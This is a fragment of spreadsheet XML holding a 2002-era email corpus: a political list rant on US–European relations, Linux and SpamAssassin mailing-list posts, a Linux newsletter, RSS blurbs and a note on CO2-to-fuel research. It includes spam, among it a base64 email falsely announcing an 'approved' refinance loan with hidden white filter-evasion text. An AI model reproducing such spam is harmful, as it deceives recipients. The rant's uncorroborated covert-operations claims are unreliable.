 &gt; basically as a thread, against which you have to defend yourself using
 &gt; power.
 This is not a correct assessment.  The American public couldn't care
 less.  However, the US intelligence community correctly perceives a
 threat, and it isn't the third-world.  Many European and other developed
 nations aggressively engage in covert operations against American
 interests.  Its been going on for years and isn't even news.  Things
 have stepped up in recent years and the US DoD is none too pleased.  For
 better or worse, the US is relatively good at that game too.  As with
 most backwater wars, they are proxies for the interests of the big
 players.
 Find a current list of the top intelligence threats to the US.  You'll
 find that half the countries on that list are European.  Most people are
 unaware of how aggressive these things have gotten in recent years.
 &gt; On the other hand the Europeans are used to the peace of their cozy 
 &gt; post-war system where external security is not an issue. All security
 &gt; threads can be resolved by giving money to the threatening people 
 &gt; and to integrate them into the wealthy sphere (Balkan, Palestinians,
 &gt; ...)
 Bullshit.  The European governments ruthlessly suppress real opposition,
 obviously some more than others.  US SpecOps are often brought in to do
 dirty work inside Europe for European governments (usually with
 government "advisors" along for the mission).  I've always wondered what
 the deal was such that we got involved at all.  The point being that
 we've acted as assassins for European governments inside their borders
 against their own citizens under the auspices of those governments, and
 in recent years, not ancient history.  I know SpecOp guys who left the
 military specifically because of the circumstances of some of these
 missions while they were posted for that duty. I'm certainly glad I was
 never assigned missions in that theater, because there is a lot of
 covert nastiness going on in nominally friendly European democracies.
 Regardless, giving money to people that threaten you has never created
 meaningful peace in the history of civilization.  We call it extortion
 under any other guise.
 &gt; A lot of the current EU - US issues can be explained by this difference 
 &gt; of perception, such as the current American unilateralism (nobody wants 
 &gt; to help us!), the American arrogance towards Europe (they don't want to 
 &gt; do anything, so why should we ask them?) and the growing rejection of the 
 &gt; American policy in Europe (they want to abolish the law!).
 Europe is looking increasingly like a basket case.  Whatever problems
 the US is having these days, Europe looks worse and is going downhill
 faster.  Why the US would want to emulate European behavior or the
 European way of doing things is beyond me.
 The US asking for major policy advice from Europe is like asking a quack
 for medical advice.  I really don't see what is wrong with "unilateral"
 anyway.  Why should anyone join a stampede that is heading for a cliff?
 I hope the incessant knee-jerk conformist screeching that Americans see
 coming from Europe doesn't actually represent the views of Europeans. 
 For various reasons I'm not exactly a cheerleader for the US government,
 but the premises of the argument against them here are lame.
 &gt; My personal point is that few Americans (percentage of overall population)
 &gt; have ever left their country, while even German construction workers
 &gt; regularly spend their holidays in Spain. So I'm not surprised that
 &gt; paranoia is growing.
 I'm betting you are underestimating the actual percentage.  The vast
 majority of people I know have lived, worked, and traveled outside the
 country at one time or another.  And I doubt Europeans have traveled
 anywhere near as much in the Western hemisphere as Americans have. 
 Despite the best efforts of France, Europe is *still* not the center of
 the universe.  I'll throw you a bone though: most Americans do consider
 Europe to be drifting into irrelevancy and therefore ignore it.  But
 from the perspective of an American, how could you NOT look at it this
 way?  The impact of Europe on America has diminished greatly over the
 years.
 I love the smell of Euro-chauvinism in the morning.
 First, you assume that the North American continent is ethnically and
 culturally homogenous.  Anybody that has actually traveled throughout
 North America knows this isn't true; there are more than five major and
 very distinct cultures and societies in the US alone, never mind the
 hundreds of diverse regional sub-populations, some of which are truly
 foreign.  Apparently Europeans confuse speaking the same language with
 having the same culture.  That would be like saying Mexico is culturally
 identical to Spain because they nominally speak the same language.  A
 Wyoming rancher has almost nothing in common culturally or socially with
 your average person living in San Francisco, despite speaking the same
 language and nominally living in the same country.  If I want to visit a
 wildly different culture for the holidays, I'll go to Oakland, New
 Orleans, or similar -- they are far more different from where I live
 than some countries I've traveled to.  And a lot of these places are
 farther from where I live than Spain is from Germany.
 Second, the State I live in is the size of Germany.  When I travel to a
 neighboring State (which I do regularly), how is this not equivalent? 
 In fact, I probably travel much farther for the holidays than your
 German construction workers.  If you look at the EU as a single country,
 only then does your analogy become comparable.  What kind of ridiculous
 superiority do Europeans get from having (relatively) tiny countries?
 In truth, I find Europe to be about as culturally homogeneous as the
 US.  There are a lot of cultural similarities across the EU with
 relatively minor local deviations that vary with distance in ways very
 similar to the US.  The only real difference is that Europeans have
 dozens of different languages, which is hardly something I would call an
 advantage.  Although there are a couple parts of the US where I can't
 understand a word they are saying either. 
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Self-denial of the literary sort
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8263548,215/
 Date: 2002-09-26T04:32:57+01:00
 *Books:* Fay Weldon may have opted to be writer in residence at the Savoy Hotel 
 in London, but Will Self has chosen a different kind of residency.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 26-hour days...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000198.html
 Date: 2002-09-26T23:32:18-08:00
 It seems that my body runs on a 25-26 hour clock, usually tending closer to 26 
 hours. This really drives me nuts sometimes. Scheduling is a real pain in the 
 ass at times. Like when I'm not even close to...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: News.Com: Google search gets newsier.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:47:06AM
 Date: Mon, 23 Sep 2002 15:47:06 GMT
 News.Com: Google search gets newsier[1].
 [1] http://rss.com.com/2100-1023-958927.html?type=pt&amp;part=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] 2.40: ready for release?
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason wrote:
 &gt; What do you all think?  are we ready to go?  anyone run into any trouble
 &gt; with the new autoconf code, or found a bug from the merge of that spamc
 I am now preparing a small patch to configure.in for NetBSD (possibly
 also useful for Open- and FreeBSD, don't know). Should be ready and
 tested in the next half hour.
 If you think 2.40 is ready, I would suggest to wait just 24 hours more
 for possible reports by b2_4_0 users. Not everyone can follow the
 development during daytime (at work).
 ciao
      Klaus
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; &gt; BTW, I think I'll kake it so that my ogle package automatically inserts
 &gt; &gt; this "options ide-cd dma=1" to /etc/modules.conf! It currently creates
 &gt; &gt; the/dev/dvd link to /dev/cdrom (which will work most of the time, if
 &gt; &gt; there's only one drive) if no /dev/dvd exists.
 &gt; 
 &gt; Eek.  Maybe it's just me, but I don't think that's a good idea. 
 &gt; Outputting a message in %post and providing a README of some kind would
 &gt; be better, as well as perhaps adding a note in %description.
 Why "Eek"? :-)
 If no /dev/dvd exists, it'll create it.
 If /dev/dvd exists, it won't touch it.
 If someone installs ogle (a DVD player), I'm assuming the hardware is
 recent enough for software playback and that the drive is a DVD-ROM... all
 of them support DMA! But since that change requires a reboot or a manual
 change, I'm still hesitating to integrate it :-/
 My goal is to allow users to install a DVD player through synaptic and play
 DVDs in no time. Outputting a message in the %post section of a package is
 always a bad idea, putting the tip in the %description sounds good though.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.07 0.14 0.16
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 BTW: I just a found a quite nice looking apt repositry for all kinds of
 audio apps at
 http://ccrma-www.stanford.edu/planetccrma/software/
 Peter
 On Thu, 2002-09-19 at 23:28, Angles Puglisi wrote:
 &gt; Matthias Saou (matthias@rpmforge.net) wrote*:
 &gt; &gt;- I've rebuilt a new "alsaplayer" package based on Angle's one.
 &gt; 
 &gt; Cool, one less package to maintain :)
 &gt; 
 &gt; One interesting thing about alsaplayer is that RedHat's XMMS package in RH8 will
 &gt; probably not play mp3 files. But alsaplayer does play mp3s "out of the box".
 &gt; 
 &gt; Also, they are developing rapidly in their CVS and looks like their next version
 &gt; of alsaplaer will be pretty cool, but I have no idea when it will be ready.
 &gt; 
 &gt; --
 &gt; That's "angle" as in geometry.
 &gt; 
 &gt;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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead &lt;ejw@cse.ucsc.edu&gt; writes:
     J&gt; You open sourced the new components you developed for this
     J&gt; project, so the next person who comes along won't have to
     J&gt; reimplement them, right?
 No need: All those components already exist either in the Java
 class libraries or from the various java jar collections.  Most
 of the classes I used came from the Jakarta project and ApacheXML
 But if it's any consolation, my threading of them all together into
 a newswire server /is/ GPL and available on sourceforge.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020715.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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07.15.2002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You're a good bunch, you Penguins.&lt;p&gt;
 Today's GnomeVOICE really tells the story better than I can, but I'll give you a 
 quick summary. Through your efforts and compassion, reader Karl Steenblik has 
 found a new electronic home for the Foundation for Children and Youth With 
 Diabetes. I'll let Karl tell you which offered solution suited his needs. But, 
 with the volume of responses his request for help generated, it's almost 
 irrelevant. As I expected, we came together as a community and collectively 
 offered him many viable choices from which to pick a solution that would work 
 for the kids. The global scope of your concern and our collective ability to 
 effect a change has humbled me once again. Just when you start to get a little 
 callous about the 'Net ...&lt;p&gt;
 Accordingly, I'd like to sketch out an idea with you that can be an ongoing part 
 of Penguin Shell. It's an open discussion, really, about how we can further put 
 our technical skills (be they Linux &lt;i&gt;or&lt;/i&gt; Windows skills) to work for a good 
 cause. I'm proposing that we start an organized volunteer effort, based in the 
 Penguin Shell readership, to provide volunteer technical services to worthwhile 
 charitable organizations. First, we need a &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Project Name 
 Suggestion"&gt;name&lt;/a&gt; that clearly describes our purpose. Next, we need 
 volunteers with the time and ability to lend those &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell - My Volunteer 
 Skills"&gt;skills&lt;/a&gt; to a good cause. Finally, we'll need some suggestions as to 
 the charitable &lt;a href="mailto:tony@lockergnome.com?subject=Penguin Shell - 
 Great Organizations"&gt;organizations&lt;/a&gt; that are near and dear to your heart. Or, 
 maybe the organization is one you're already working with - one you're certain 
 can use some hands-on or remote volunteer help.&lt;p&gt;
 I'll start that ball rolling with a personal organizational suggestions - the &lt;a 
 href="http://www.aicardi.com/" target="_blank"&gt;Aicardi Syndrome Foundation&lt;/a&gt;. 
 Though I don't currently know their technical needs, I do know that the syndrome 
 is very rare - read "research and technical dollars are minimal." I'm sure we 
 can, as a group, provide them a way to fill existing technical holes.&lt;p&gt;
 That's just a suggestion. Feel free to use the mailto links above to make 
 others.&lt;p&gt;
 Over the next few weeks, I plan on modifying my current favorite blogging 
 program, &lt;a href="http://geeklog.sourceforge.net/" target="_blank"&gt;GeekLog&lt;/a&gt; 
 to pull together a community project area where interested parties can gather, 
 coordinate and discuss whatever this project might become. I'll keep you posted 
 on the details.&lt;p&gt;
 In one of the earliest issues of Penguin Shell, I told a story about Emperor 
 Penguins - how they huddle together on the shore, knowing that their protection 
 from predators lies in sheer numbers. When one takes the leap into the water, 
 all the others follow; individual involvement for the good of the community.&lt;p&gt;
 Where could the analogy possibly be more fitting?&lt;p&gt;&lt;p&gt;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&lt;b&gt;Quick Shortcuts&lt;/b&gt;&lt;p&gt;
 Linux is chock full of keyboard shortcuts that, when used, streamline the way 
 you use your system. Today's Tweaks are really user tweaks - built in shortcuts 
 you can use to maximize your Linux efficiency. You don't have to change your 
 system, just how you use what's already there. They're two tips that are quick 
 and very easy to learn and remember.&lt;p&gt;
 Got a cluttered console screen? Use &lt;b&gt;[ctrl]+l&lt;/b&gt; to clear it. This does the 
 same thing as the &lt;b&gt;clear&lt;/b&gt; command with far fewer keystrokes.&lt;p&gt;
 Do you want to log out of the console screen quickly? Use the &lt;b&gt;[ctrl+d&lt;/b&gt; key 
 combination. This will log out the current user. If you're using bash and the 
 current user is not root, the [ctrl]+d combination will close the terminal 
 window, as well.&lt;p&gt;
 To me, any opportunity to save keystrokes is a good one. Better yet, if I can 
 avoid having to take my fingers from the keyboard to reach for the mouse, then 
 I've really saved some time. Though it's tough to quantify the time savings 
 using these keystroke combination shortcuts, intuitively I can tell you it's 
 substantial.&lt;p&gt;
 Maximum efficiency. That's what Tweaks are all about.&lt;p&gt;&lt;p&gt;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XI&lt;/b&gt;&lt;p&gt;
 We've covered some fairly light topics to this point in the kernel configuration 
 series. Today's topic requires a bit of review. We'll discuss configuring block 
 devices in your kernel.&lt;p&gt;
 We've talked about the different types of devices in previous Penguin Shell 
 issues. Fundamentally, the two that you'll deal with the most are block and 
 character devices. These draw their type names from the way they handle data. 
 Block devices receive data for storage in chunks, generally pre-set sizes of 
 data "blocks." Hard drives are block devices. They'll only write chunks of data 
 to storage. Thus, the problem with shutting down your machine uncleanly. Data 
 intended for storage may not, in fact, have been written at the time your power 
 dies or you hard kill your machine. The system may still be accumulating data up 
 to the proper block size before committing it to the hard drive.&lt;p&gt;
 Character devices, on the other hand, receive data in "streams," one character 
 at a time. Serial ports are a great example of character devices. They handle 
 data input and output on the fly, rather than filling a buffer &lt;i&gt;then&lt;/i&gt; 
 committing the data.&lt;p&gt;
 The physical nature of these device types goes a long way toward explaining why 
 they handle data as they do. A hard drive has to physically spin up to store or 
 retrieve data. You're actually changing the magnetic properties of the disc 
 surface when you store data. Consequently, a hard drive has to know where 
 there's free space on the disc surface, has to move that area of the disc under 
 the write head and try, as best it can, to group blocks of related data 
 together.&lt;p&gt;
 Character devices really don't store data as much as they send it off and forget 
 about it. The process is purely electrical rather than electrical and physical. 
 The serial port, for example, sends data in a stream to your Palm Pilot. The 
 storage of the data is actually handled by the Palm itself, not a physical 
 storage device on the computer. There's no need to spin up a drive and account 
 for the data as is necessary with a hard drive. The Palm will also send a signal 
 back to the computer confirming receipt of data. That's an indication that 
 character devices often communicate in both directions, as well.&lt;p&gt;
 So, when you're configuring block devices in your kernel, you're preparing the 
 system for communicating with a device that will buffer data to a predetermined 
 level, then write that data as a block, changing the physical properties of the 
 hard drive disc surface. Even though that's the highest level view of the 
 process, it still shows how difficult a process physical data storage really 
 is.&lt;p&gt;
 In the block device section, you'll find many options for physical data storage. 
 When configuring this section, it's crucial to know as much about your existing 
 hardware as possible. What type (brand) of hard drives are you using? What's the 
 interface to the machine - IDE, parallel, etc? Where is the drive located - on 
 the local machine or on a network-connected box? Because the variables are so 
 broad, it's nearly impossible to give you a stock configuration tip that will 
 work for your personal machine every time. I can tell you this - you will have 
 block devices (normally a hard drive and a floppy), and you need to answer as 
 many of the above questions as you can. Find out as much about these physical 
 devices as you can, and the configuration process will be relatively 
 painless.&lt;p&gt;
 A warning - you'll see more configuration tips like this as the series continues 
 to progress. I'll certainly make hands-on configuration recommendations where 
 possible. There are quite a few areas where I can make such recommendations. 
 However, where the variable set is as broad as block devices, much of the 
 legwork will be up to you.&lt;p&gt;
 Tomorrow, we'll talk about RAID and multi-device support in Linux.&lt;p&gt;
 &lt;p&gt;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&lt;b&gt;rxLinux&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.fusionw3.com/rxlinux/ 
 "&gt;http://www.fusionw3.com/rxlinux/ &lt;/a&gt;&lt;p&gt;
 "The concept behind rxlinux is to centralise configuration and management of 
 multiple Linux servers. New servers can be deployed in minutes. A Web interface 
 is used to build custom ISO CD-ROMs dedicated for specific servers. Servers, 
 also called rxnodes, boot up from that CD-ROM and get the rest of the 
 configuration and software from a master server. No administration is done 
 directly on the nodes; everything is controlled from the master servers. When 
 the rxnode has finished booting up and all software is running, it is completely 
 independent from the rxmaster until the next reboot."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Penguin Hearts&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Karl Steenblik&lt;/span&gt;&lt;p&gt;
 "I can not believe all of the help your posting to the Linux community has
 generated.  I have had over 20 offers for help.  Some of the offers would
 not fit our space needs but that number of responses shows that Linux
 people care.&lt;p&gt;
 "I am overwhelmed with gratitude with Lockergnome and
 &lt;a href="http://digitaldaze.com/" target="_blank"&gt;http://digitaldaze.com/&lt;/a&gt;&lt;p&gt;
 "Bill at Digitaldaze has sent us a large gift of 100 MB of space.  More
 that I think we will ever use.&lt;p&gt;
 "I thank all of the people who offered help.  There are more generous
 people than I can type to individually.  Our camp will hold Linux people
 in the highest esteem and I will make sure Linux, Lockergnome, and
 Digitaldaze have a prominent places on our site in the future.&lt;p&gt;
 "Soon you will be able to visit our new site at
 &lt;a href="http://fcyd.digitaldaze.com/" 
 target="_blank"&gt;http://fcyd.digitaldaze.com/&lt;/a&gt;.&lt;p&gt;
 "Now the work for me begins, moving the site!  Oh the labors of love that
 make us whole.&lt;p&gt;
 "Everyone have a super day.&lt;p&gt;
 "Thank you again for all of your help.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Software.Linux.Com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" 
 href="http://software.linux.com/index/"&gt;http://software.linux.com/index/&lt;/a&gt;&lt;p&gt;
 Software.Linux.Com is the revitalized version of Linux.DaveCentral. True to its 
 roots, the site is a great starting point for Linux software and information. 
 Software is categorized under such headings as Audio, File Utilities, Office 
 Applications, and System Utilities. The site also features up-to-date listings 
 of the most recent and most popular Linux software, as well as a program of the 
 day. This site will definitely get bigger, but even for now, it's got nearly any 
 Linux app you're looking for.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020715.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020715.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com]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</si>
  <si>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John Gay wrote:
 &gt; looking into these things. As Isaid, the PGCC site does not seem to have been 
 &gt; updated in at least a year or more?!? I am also looking into GCC itself. Now 
 &gt; that the 3.1. series is out, it might be better than when the PGCC patches 
 &gt; were written
 gcc has been as good as or better than pgcc for quite a while. pgcc was 
 was written back in the days when gcc splintered due to a perception of 
 slow progress on the main branch. A number of Linux distributions wound 
 up using egcs, partly derived from the pgcc work as I recall. Happiness 
 was restored to the world with gcc 2.95 and later.
  &gt; The bottom line is, Pentiums have better instruction sets than
 &gt; the original 386 instructions that they still support.
 Not really, no. The only instruction of consequence (to gcc anyway) 
 since the i386 was the CMOV introduced with the Pentium Pro. gcc 2.95 
 will use that instruction if directed to with -march=pentiumpro and you 
 will generally get a few percent improvement out of it. Code compiled 
 with that option will fail on Pentium and earlier processors.
 &gt; The Pentium also 
 &gt; started introducing pipelining so properly generated code can be upto 30% 
 &gt; faster than equivulent code that performs the same function!
 That's the art of instruction scheduling - rearranging the instructions 
 generated by the compiler such that they make best use of the parallel 
 ("superscalar") pipelines present in a modern CPU. gcc 2.95 has a fair 
 go at scheduling according to the -mcpu=pentium/pentiumpro option. gcc 
 3.1 does a better job, and fine tunes for a few more processors such as 
 athlon and athlon-xp. They're in the process of replacing the compiler's 
 instruction scheduling with a whole new mechanism that should do an even 
 better job, but that's a ways down the road yet in gcc 3.3.
 As for the exotic extra instructions sets, gcc 3.1 will make use of SSE 
 or SSE2 instructions instead of 387 instructions if you use the 
 -mfpmath=sse option and you may see some speed benefit from it, but 
 there's a chance you may also see incompatibilities. gcc will still use 
 i387 code for missing functionality in the SSE instruction set (double 
 precision floats for example).
 AFAIK no current gcc will ever use MMX or 3DNOW! instructions though gcc 
 3.1 enables user code to explicitly generate these instructions with C 
 code. The kernel sometimes uses these instruction sets to get super-fast 
 block copies of memory or RAID math but not much else.
 &gt; Not sure what improvements the P4 introduce? I think it's mostly just speed 
 &gt; improvements rather than any execution changes.
 P4 introduced SSE2, a _MUCH_ improved version of SSE and a viable 
 replacement for i387 FPU code. SSE supports only single precision floats 
 while SSE2 can handle doubles. MMX and SSE shared registers with the FPU 
 which hobbles them a bit, but SSE2 has its own large, dedicated register 
 file. So far P4 is the only CPU equipped with SSE2. AMD's x86-64 CPUs 
 are said to have it as well. Of course x86-64 itself is a whole other 
 ball game...
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-12-02
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * The 2002 Perl Advent Calendar
 +--------------------------------------------------------------------+
 | The 2002 Perl Advent Calendar                                      |
 |   posted by pudge on Sunday December 01, @16:15 (modules)          |
 |   http://use.perl.org/article.pl?sid=02/12/01/2057219              |
 +--------------------------------------------------------------------+
 [0]2shortplanks writes "Doesn't December come round quickly? Announcing
 the [1]third Perl Advent Calendar, the Advent calendar that features a
 different Perl module each day of Advent, and a bonus module on Christmas
 day. This year's improvements include each day having its own
 mini-tutorial attached, and much better HTML."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/12/01/2057219
 Links:
     0. mailto:useperlreply@twoshortplanks.com
     1. http://www.perladvent.org/2002/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</si>
  <si>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 You're approved. **
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B4_26B74D8A.B2187A61
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQo8Ym9keT4NCjxmb250IGNvbG9yPSJmZmZmZmYiPnNreTwvZm9u
 dD4NCjxwPllvdXIgaG9tZSByZWZpbmFuY2UgbG9hbiBpcyBhcHByb3ZlZCE8
 YnI+PC9wPjxicj4NCjxwPlRvIGdldCB5b3VyIGFwcHJvdmVkIGFtb3VudCA8
 YSBocmVmPSJodHRwOi8vd3d3Lm1vcnRnYWdlcG93ZXIzLmNvbS9BcHByb3Zl
 ZC5odG0iPmdvDQpoZXJlPC9hPi48L3A+DQo8YnI+PGJyPjxicj48YnI+PGJy
 Pjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+
 PGJyPjxicj48YnI+DQo8cD5UbyBiZSBleGNsdWRlZCBmcm9tIGZ1cnRoZXIg
 bm90aWNlcyA8YSBocmVmPSJodHRwOi8vd3d3Lm1vcnRnYWdlcG93ZXIzLmNv
 bS9yZW1vdmUuaHRtbCI+Z28NCmhlcmU8L2E+LjwvcD4NCjxmb250IGNvbG9y
 PSJmZmZmZmYiPnNreTwvZm9udD4NCjwvYm9keT4NCjxmb250IGNvbG9yPSJm
 ZmZmZmYiPjFnYXRlDQo8L2h0bWw+DQo4ODQ0Z2F2SjMtNDA5cGdkQTg4NjNr
 YkZJMC0wMDRBTkZjMDM2NmwzNg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Low Cost Life Insurance -- FREE Quote amyns
</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Cost Term-Life Insurance!
 SAVE up to 70% or more on your term life insurance policy now.
 Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
 CLICK HERE NOW For your FREE Quote!
 http://211.78.96.11/insurance/
 If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
 We offer the lowest rates available from nationally recognized carriers.
 Act now and pay less!
 CLICK HERE 
 http://211.78.96.11/insurance/
 ++++++++++++++++++++++++++++
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://211.78.96.11/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Phil Wolff: Dave Winer books I'll buy. _Sweet! _
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:00:00AM
 Date: 1/1/1904; 12:00:00 AM
 Phil Wolff: Dave Winer books I'll buy[1]. _Sweet! _
 [1] http://dijest.com/aka/2002/09/23.html#a2082
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Viridian Note 00328: Fuel from CO2
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts:  Nakamichi Yamasaki, hydrocarbon
 generation, carbon dioxide, industrial chemistry
 Attention Conservation Notice: Yet another
 weird Nipponese scheme, about some miracle
 gizmo that runs on pollution
 Links:
 Tornados in Britain?  Maybe it really is the 51st State.
 http://www.thesun.co.uk/article/0,,2-2002362050,00.html
 Newfangled suntan pill alleged to have peculiar side-
 effects.
 http://timesofindia.indiatimes.com/articleshow.asp?art_id=18672487
 See all those really bright places? Well, that's
 where the Greenhouse comes from.
 http://www3.cosmiverse.com/news/earthobservatory/0802/images/land_ocean_ice_lights_080602_1bi
 g.jpg 
 The West Nile plague has reached Austin.
 http://www.planetark.org/dailynewsstory.cfm/newsid/17239/story.htm
 ---------------------------------------------------
 Entries in the Global Civil Society Design Contest.
 From: Steven W. Schuldt &lt;swschuldt*mac.com&gt;
 http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpg
 From: Ben Davis &lt;bend*earthlink.net&gt;
 http://www.digitaleverything.com/GlobalComputer.htm
 From: Joerg F. Wittenberger &lt;Joerg.Wittenberger*pobox.com&gt;
 http://www.askemos.org/ 
 http://www.askemos.org:9080/RomePaper.pdf
 From: Scott Vandehey &lt;scot*spaceninja.com &gt;
 http://spaceninja.com/viridian/notebook.html
 From: Bob Morris &lt;bob*bomoco.com&gt;
 http://viridianrepository.com/GlobalCivil/
 From: Anonymous
 http://home.freiepresse.de/befis/zx2000.html
 http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
 http://www.vkb.co.il/
 From: Jim Thompson &lt;jim*musenki.com&gt;
 http://www.simputer.org
 http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.html
 From: Mike Rosing &lt;eresrch*eskimo.com&gt;
 http://www.eskimo.com/~eresrch/viridian
 From: Till Westermayer &lt;till*tillwe.de&gt;
 http://www.westermayer.de/till/projekte/02gcsdl.htm
 From:Duncan Stewart &lt;stewarts*stewarts.org?&gt;
 http://www.stewarts.org/viridian/GCS
 From: R. Charles Flickinger &lt;idlewild*mac.com&gt;
 http://homepage.mac.com/iHUG/GCS2000.html
 From: Kevin Prichard &lt;kevin*indymedia.org&gt;
 http://www.nah6.com/
 http://www.nah6.com/nah6-h2k2_files/v3_document.html
 From: Dave Phelan &lt;dphelan*pavilion.co.uk
 "Please find my entry here:"
 http://www.btinternet.com/~dphelan/viridian/gcs-computer.html
 "I'm no graphic artist == the feature list is the 
 important part of the design."
 dphelan*pavilion.co.uk  Blog: 
 http://www.btinternet.com/~dphelan
 This contest expires in four days:   August 15, 2002. 
 ----------------------------------------------------
 Source:
 http://www.newscientist.com/news/news.jsp?id=ns99992620
 "Carbon dioxide turned into hydrocarbon fuel 
 (((Please, no immediate lectures on the second law of 
 thermodynamics. I have plenty of those.)))
 "16:0002August02
 "A way to turn carbon dioxide into hydrocarbons has caused 
 a big stir at an industrial chemistry conference in New 
 Brunwick, New Jersey. Nakamichi Yamasaki of the Tokushima 
 Industrial Technology Center in Japan says he has a 
 process that makes propane and butane at relatively low 
 temperatures and pressures."
 Link: Yes, he actually exists:
 http://www.it.sakura.ne.jp/~koatsu/c_journal/ab/1_10/01-2.html
 http://www.itc.pref.tokushima.jp/English/eindex.html
 "Making fuel from greenhouse gases
 "While his work still needs independent verification,  
 (((okay, go fetch us some, then))) if he can make even 
 heavier hydrocarbons, it might be possible to make petrol. 
 It has carbon chains that are between five and 12 atoms 
 long == butane is four atoms long.  ((("That's right, 
 Professor: I just hook it up to the sky and I make 
 gasoline!")))
    "The work suggests the tantalising prospect that CO2, 
 the main greenhouse gas, could be recycled instead of 
 being pumped into the atmosphere.
     "Many people have tried before to make hydrocarbons by 
 mixing carbon with hydrogen gas in a reaction chamber at 
 very high temperatures, but yields have always been 
 pitiful. Yamasaki has used hydrochloric acid as his source 
 of hydrogen ions. ((("But where are we s'posed to get all 
 that hydrochloric acid?" Yes, I know, I know.)))
     "He bubbles the CO2 into a reaction vessel where it is 
 heated to about 300 C at 100 times atmospheric pressure. 
 The heat and pressure are low enough, says Yamasaki, to 
 make it feasible to scale up the reaction so it can run on 
 a power station's waste heat. (((Imagine the fun when a 
 giant tank of pressurized acid blows up.)))
 "Iron powder 
    "Using iron powder as a catalyst, Yamasaki says he has 
 made substantial amounts of methane, ethane, propane and 
 butane, which he was able to vent off as gases when the 
 mixture cooled. If he can improve the catalyst's 
 performance he is hopeful of making heavier hydrocarbons 
 such as petrol, too. 
     "William Siegfried, who has lead similar experiments 
 at the University of Minnesota in the twin cities of 
 Minneapolis and St Paul, says his group was only able to 
 make methane at far higher temperatures. But his process 
 also used a nickel-based alloy as a catalyst, rather than 
 iron.
     "Siegfried's group was investigating whether natural 
 methane deposits might have formed chemically with the 
 metal in rocks acting as a catalyst rather than forming 
 from the decay of rotting biological material over aeons.  
 (((Paging Thomas Gold! "Deep Hot Biosphere" calling on 
 line one.)))
    "Unless Yamasaki's technology can make the more 
 valuable heavier hydrocarbons such as petroleum, which are 
 liquid at room temperature, it will not be much more use 
 than present-day bioreactors, in which bacteria that like 
 to feed on CO2 are induced to produce methane. 'Organisms 
 have a special talent for that kind of reaction,' says 
 Siegfried.
 O=c=O O=c=O O=c=O O=c=O
 FED-EX IS HERE WITH
 YOUR WORLD-SAVING
 MIRACLE GIZMO
